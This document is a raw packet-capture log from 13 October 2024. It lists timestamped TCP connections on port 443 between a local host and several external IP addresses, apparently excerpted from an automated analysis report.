                                                                                                                          Oct 13, 2024 18:20:43.538539886 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.538572073 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.538635969 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.538759947 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.538836956 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.538912058 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.538955927 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.538983107 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.538995981 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539024115 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.539042950 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.539479971 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539551973 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.539699078 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539764881 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.539769888 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539782047 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539832115 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539833069 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.539843082 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.539891005 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.539912939 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.540555000 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.540627956 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.540631056 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.540642977 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.540692091 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.540730000 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.540774107 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.540791988 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.540807962 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.540836096 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.540854931 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.541598082 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.541662931 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.541662931 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.541672945 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.541712999 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.541714907 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.541733980 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.541765928 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.541784048 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.541997910 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542066097 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.542198896 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542241096 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542264938 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.542278051 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542300940 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.542325020 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.542527914 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542581081 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.542880058 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542943001 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.542973995 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.542990923 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543006897 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543016911 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543039083 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543049097 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543066978 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543071985 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543092966 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543102026 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543129921 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543148994 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543396950 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543466091 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543677092 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543735981 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543735981 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543746948 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543786049 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.543798923 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543909073 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.543956041 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.544141054 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.544159889 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.704469919 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.704540014 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:43.725675106 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:43.725747108 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.726136923 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.775836945 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:43.816260099 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:43.849056959 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.849328995 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:43.849356890 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.850799084 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.850873947 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:43.855381012 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:43.855484009 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.855551004 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:43.855578899 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.863405943 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.906404972 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.100626945 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.100769043 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.100857019 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:44.100879908 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.100909948 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.100920916 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.100956917 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.100965023 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.100987911 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.101000071 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.101021051 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.101021051 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.101047993 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.101053953 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.101119041 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.101186991 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.101783037 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.101809025 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.102160931 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:44.102180004 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.102202892 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:44.102210999 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.137510061 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.137598991 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.137643099 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.137708902 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.137753010 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.137945890 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.180414915 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.180414915 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.180447102 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.180500031 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:44.220196009 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.220211983 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.220304966 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.220726013 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.220736027 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.264436960 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:44.264492035 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.265310049 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:44.269496918 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:44.269531012 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.521136999 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:44.521157026 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.521219015 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:44.524136066 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:44.524146080 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.718806028 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.719151020 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.719185114 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.720428944 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.720490932 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.720909119 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.720976114 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.721090078 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.767399073 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.768388033 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.768397093 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.815718889 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.896791935 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.897049904 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.897054911 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.898713112 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.898778915 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.899971008 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.900053024 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.900194883 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.900198936 CEST4434976218.66.102.15192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.944307089 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.944334030 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.944341898 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.944376945 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.944376945 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.944411993 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.944433928 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.944444895 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:44.954498053 CEST49762443192.168.2.418.66.102.15
                                                                                                                          Oct 13, 2024 18:20:44.989053965 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.006896019 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.006984949 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:45.008107901 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.008116961 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.008141994 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.008172989 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.008208990 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.009002924 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:45.009011030 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.009320021 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.010519028 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:45.033438921 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.033447981 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.033471107 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.033497095 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.033530951 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.034410954 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.034423113 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.034470081 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.055404902 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.058792114 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.058799028 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.058857918 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.085053921 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.085062027 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.085107088 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.122061968 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.122070074 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.122134924 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.123080015 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.123142958 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.124984026 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.125041008 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.125199080 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.125252962 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.125372887 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.125423908 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.148085117 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.148161888 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.174067974 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.174168110 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.210818052 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.210902929 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.211065054 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.211127043 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.211204052 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.211278915 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.212248087 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.212312937 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.213119984 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.213190079 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.213316917 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.213367939 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.213960886 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.214029074 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.214685917 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.214751959 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.214983940 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.215042114 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.215739012 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.215801001 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.237000942 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.237078905 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.263044119 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.263124943 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.263314962 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.263375044 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.263570070 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.263665915 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.263823986 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.263878107 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.299943924 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.300017118 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.300071001 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.300128937 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.300379038 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.300452948 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.300796032 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.300858974 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.301206112 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.301259041 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.301480055 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.301537037 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.301631927 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.301687956 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.302284956 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.302340984 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.302504063 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.302555084 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.303111076 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.303169966 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.326071978 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.326169014 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.326262951 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.326323032 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.336625099 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.336693048 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.336791992 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:45.337634087 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:45.337665081 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.337681055 CEST49763443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:45.337690115 CEST44349763184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.351970911 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.352046967 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.352046967 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.352060080 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.352104902 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.352242947 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.352294922 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.356585026 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.356851101 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.356863022 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.357904911 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.357983112 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.358431101 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.358479977 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.358659983 CEST49766443192.168.2.491.228.74.200
                                                                                                                          Oct 13, 2024 18:20:45.358665943 CEST4434976691.228.74.200192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.388756990 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.388844967 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.388905048 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.388962984 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.389060020 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.389113903 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.389240980 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.389298916 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.389496088 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.389549971 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.389753103 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.389812946 CEST49760443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:45.390054941 CEST44349760162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.390116930 CEST49760443192.168.2.4162.214.111.33
